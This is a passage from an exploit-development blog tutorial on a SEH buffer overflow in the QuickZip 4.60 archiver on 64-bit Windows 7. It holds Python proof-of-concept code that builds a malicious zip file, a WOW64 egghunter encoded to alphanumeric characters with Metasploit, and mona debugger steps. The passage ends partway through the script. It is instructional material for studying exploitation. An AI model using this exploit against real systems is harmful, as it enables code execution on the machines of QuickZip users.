</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;CCCC&quot;</span>               <span class="c"># SEH</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>   <span class="c"># padding for the rest of payload</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;.txt&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Length = &quot;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>
</span><span class='line'>
</span><span class='line'><span class="n">exploit</span> <span class="o">=</span> <span class="n">header_1</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_2</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_3</span>
</span><span class='line'>
</span><span class='line'><span class="n">mefile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">&#39;cst.zip&#39;</span><span class="p">,</span><span class="s">&#39;w&#39;</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">exploit</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Exploit complete!&quot;</span>
</span></code></pre></td></tr></table></div></figure>


<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/7.SEH%20properly%20overwritten.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/7.SEH%20properly%20overwritten.png" alt="image" /></a></p>

<p>Great, we have control of the SEH! Let&rsquo;s pass exception to the program (<code>SHIFT + F9</code>) and investigate further what happens.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/8.SEH%20pop-pop-ret%20STACK%20view.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/8.SEH%20pop-pop-ret%20STACK%20view.png" alt="image" /></a></p>

<p>Of course another exception triggered, since <code>43434343</code> is an invalid memory address for this program, but let&rsquo;s see what happens on the stack - typically for SEH overflows, we&rsquo;ll need invoke a set of <em>POP-POP-RET</em> instructions to return to our buffer.</p>

<p>It&rsquo;ll be easy to find such instructions with <code>mona</code>, but first, we have to know what characters are we actually allowed to use. And that&rsquo;s where the problems start&hellip;</p>

<h2>Badchars</h2>

<p>Well, in summary, it&rsquo;s most of them. Why? Because our overflow is on the filename parameter and filenames are quite restricted - generally ASCII printable characters only.</p>

<p>Since it would take way too long to actually manually go through it with mona and try to find all bad chars, I just assumed that I can only use pretty much entire ASCII table (characters up to 0x7F) except <code>0x00</code>, <code>0x0a</code> and <code>0x0d</code> (<code>NULL</code> byte, new line and carriage-return respectively).</p>

<p>This assumption may make it more difficult than it really is (since I may be avoiding characters that are actually OK to use) or may cause me even more problems later if some of the characters from my assumed range are, in fact, incorrect.</p>

<p>I don&rsquo;t really like making assumptions like this, but for the sake of this exercise, let&rsquo;s make an exception.</p>

<p>I will just need to remember to be careful and if something doesn&rsquo;t work, to double check bad chars once again. A bit risky, but well, bring it on!</p>

<h2>POP-POP-RET</h2>

<p>Let&rsquo;s find an exploit-friendly address of a <em>POP-POP-RET</em> instructions with mona:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona seh</span></code></pre></td></tr></table></div></figure>


<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/9.pop-pop-ret-mona.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/9.pop-pop-ret-mona.png" alt="image" /></a></p>

<p>A lot of results are found (7909!), but the highlighted result looks promising - consists of all aphanumerical characters and is located in the <code>QuickZip.exe</code> binary itself, hopefully making it more cross-platform friendly as we don&rsquo;t need to rely on specific operating system DLLs.</p>

<p>The only problem here is the <code>0x00</code> byte, however, because of the address space of the program, every address starts with <code>0x00</code>&hellip; let&rsquo;s try and see if it&rsquo;ll actually break our exploit.</p>

<p>Update the PoC exploit replacing <code>CCCC</code> currently representing SEH with <code>\x33\x28\x42\x00</code>, trigger the crash once again and investigate SEH chain.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/10.SEH%20chain%20with%20pop-pop-ret.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/10.SEH%20chain%20with%20pop-pop-ret.png" alt="image" /></a></p>

<p>Great, looks like our address wasn&rsquo;t scrambled and looks like we expected it to look. Set the breakpoint at it (<code>F2</code>) and press <code>SHIFT + F9</code> to pass the control to the program.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/11.pop-pop-ret%20instructions.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/11.pop-pop-ret%20instructions.png" alt="image" /></a></p>

<p>As you can see, we&rsquo;re redirected to <em>POP-POP-RET</em> instructions, let&rsquo;s step through them with <code>F8</code> and stop after <code>RETN 4</code> instruction.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/12.after%20pop%20pop%20ret.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/12.after%20pop%20pop%20ret.png" alt="image" /></a></p>

<p>Awesome, we have landed back in our payload&hellip; but there&rsquo;s a problem. Because of the <code>NULL</code> byte, everything after SEH chain got cut off, not leaving us much space to do anything at all.</p>

<h2>Where did the shellcode go?!</h2>

<p>OK, let&rsquo;s analyse the situation and see where are we at.</p>

<p>We get our crash and we control SEH, great! The problem is that we&rsquo;re limited to a very restricted set of characters to use with our payload and, because we had to use address with <code>NULL</code> byte to invoke <em>POP-POP-RET</em> instructions, signifcant portion of our payload got cut off and the remaining space for our shellcode is not very big at all.</p>

<p>But how big is it exactly? Remember that we still have the padding we used at the beginning of our payload to get to SEH:</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/13.before%20landing%20in%20SEH.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/13.before%20landing%20in%20SEH.png" alt="image" /></a></p>

<p>So how much space do we have? Exactly <strong>292</strong> bytes. Unfortunately it is not enough for any useful shellcode that would also need to be encoded to only contain ASCII printable characters.</p>

<p>This sounds like something that could be potentially solved with an egghunter!</p>

<p><strong>Egghunter</strong> is simply a bunch of instructions that look for a specific, known sequence of bytes (an &ldquo;egg&rdquo;) in the memory space of the program and, once it&rsquo;s found, redirects exection to that area.</p>

<p>This way, we don&rsquo;t really need to worry where our shellcode ends up, we can just call egghunter routine and it&rsquo;ll find it for us!</p>

<p>Sounds great, but the next question is, does the &lsquo;cut off&rsquo; portion of the payload actually ends up anywhere in the memory? Let&rsquo;s find out.</p>

<p>Let&rsquo;s generate pattern of <strong>3764</strong> unique characters (to fill in our payload after the <code>NULL</code> byte) and replace existing A&rsquo;s with it.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona pc 3764</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s trigger the crash and, as we get our first exception, do not pass the exception to the program, but instead invoke the following command to search for the previously generated pattern in memory:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona findmsp</span></code></pre></td></tr></table></div></figure>


<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/14.rest%20of%20payload%20in%20memory.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/14.rest%20of%20payload%20in%20memory.png" alt="image" /></a></p>

<p>Fantastic! The entire &lsquo;cut off&rsquo; portion of the payload is still in the memory, so we should be able to successfully use the egghunter to get to our shellcode.</p>

<h2>Egghunter</h2>

<p>So now we know that we should be able to use an egghunter to get to our shellcode, but we only have <strong>292</strong> bytes at our disposal. We can actually do quite a lot with 292 bytes, however, we need to remember that we can only use very limited character set.</p>

<p>Let&rsquo;s try to encode the egghunter with metasploit&rsquo;s <code>x86/alpha_mixed</code> encoder and see how much space we&rsquo;ll have left after this.</p>

<p>Firstly, let&rsquo;s generate egghunter payload. Remember that we&rsquo;re dealing with 64-bit OS, so we need to use appropriate egghunter routine as well (a lot more detailed information on it can be found on <a href="https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/">https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/</a>):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona egghunter -wow64</span></code></pre></td></tr></table></div></figure>


<p>Copy the generated bytes into a text file and convert it into a binary file using <code>xxd</code>:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'># cat egghunter-wow64.txt 
</span><span class='line'>31db53535353b3c06681caff0f42526a265833c98bd464ff135e5a3c0574e9b8773030748bfaaf75e4af75e1ffe7
</span><span class='line'># cat egghunter-wow64.txt | xxd -r -p &gt; egghunter-wow64.bin</span></code></pre></td></tr></table></div></figure>


<p>Now, we need to use an encoder to ensure only ASCII printable characters are actually used.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'># msfencode -e x86/alpha_mixed bufferregister=eax -i egghunter-wow64.bin
</span><span class='line'>[*] x86/alpha_mixed succeeded with size 146 (iteration=1)
</span><span class='line'>
</span><span class='line'>buf = 
</span><span class='line'>"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
</span><span class='line'>"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
</span><span class='line'>"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
</span><span class='line'>"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x66\x51\x49\x4b" +
</span><span class='line'>"\x52\x73\x53\x63\x62\x73\x36\x33\x4e\x53\x6f\x30\x75\x36" +
</span><span class='line'>"\x6d\x51\x59\x5a\x49\x6f\x36\x6f\x72\x62\x71\x42\x42\x4a" +
</span><span class='line'>"\x66\x46\x56\x38\x74\x73\x78\x49\x4c\x4b\x4b\x64\x61\x74" +
</span><span class='line'>"\x49\x6f\x47\x63\x31\x4e\x50\x5a\x77\x4c\x77\x75\x53\x44" +
</span><span class='line'>"\x49\x79\x38\x38\x52\x57\x36\x50\x50\x30\x33\x44\x6c\x4b" +
</span><span class='line'>"\x59\x6a\x4e\x4f\x32\x55\x38\x64\x4e\x4f\x70\x75\x6b\x51" +
</span><span class='line'>"\x6b\x4f\x79\x77\x41\x41"</span></code></pre></td></tr></table></div></figure>


<p><em>Note:</em> I have used <code>bufferedregister=eax</code> option. The reason being is that the encoder needs to find where it is in the memory to be able to carry on with decoding the payload. Originally, the routines responsible for doing this are not in the ASCII printable set and therefore would be breaking our payload.</p>

<p>Specifying <code>bufferregister</code> option basically tells the encoder not to worry about finding its own place in memory as we&rsquo;ll do it beforehand and we&rsquo;ll put its address in the EAX register. This way, our encoded egghunter is purely ASCII characters only (more information on generating alphanumeric shellcode can be found <a href="https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/">here</a>).</p>

<p>Let&rsquo;s update our PoC exploit to reflect what we have done so far.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_1</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_2</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x24\x00\x00\x00\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">header_3</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Building PoC..&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">4064</span>
</span><span class='line'><span class="n">nseh_offset</span> <span class="o">=</span> <span class="mi">292</span>
</span><span class='line'>
</span><span class='line'><span class="c"># msfencode -e x86/alpha_mixed bufferregister=eax -i egghunter-wow64.bin</span>
</span><span class='line'><span class="c"># [*] x86/alpha_mixed succeeded with size 146 (iteration=1)</span>
</span><span class='line'><span class="n">egghunter</span> <span class="o">=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x66\x51\x49\x4b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x52\x73\x53\x63\x62\x73\x36\x33\x4e\x53\x6f\x30\x75\x36</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x6d\x51\x59\x5a\x49\x6f\x36\x6f\x72\x62\x71\x42\x42\x4a</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x66\x46\x56\x38\x74\x73\x78\x49\x4c\x4b\x4b\x64\x61\x74</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x6f\x47\x63\x31\x4e\x50\x5a\x77\x4c\x77\x75\x53\x44</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x49\x79\x38\x38\x52\x57\x36\x50\x50\x30\x33\x44\x6c\x4b</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x59\x6a\x4e\x4f\x32\x55\x38\x64\x4e\x4f\x70\x75\x6b\x51</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x6b\x4f\x79\x77\x41\x41</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">=</span> <span class="n">egghunter</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>   <span class="c"># padding for nSEH</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                               <span class="c"># nSEH</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x33\x28\x42\x00</span><span class="s">&quot;</span>                   <span class="c"># SEH</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev&quot;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;.txt&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Length = &quot;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>
</span><span class='line'>
</span><span class='line'><span class="n">exploit</span> <span class="o">=</span> <span class="n">header_1</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_2</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_3</span>
</span><span class='line'>
</span><span class='line'><span class="n">mefile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">&#39;cst.zip&#39;</span><span class="p">,</span><span class="s">&#39;w&#39;</span><span class="p">);</span>
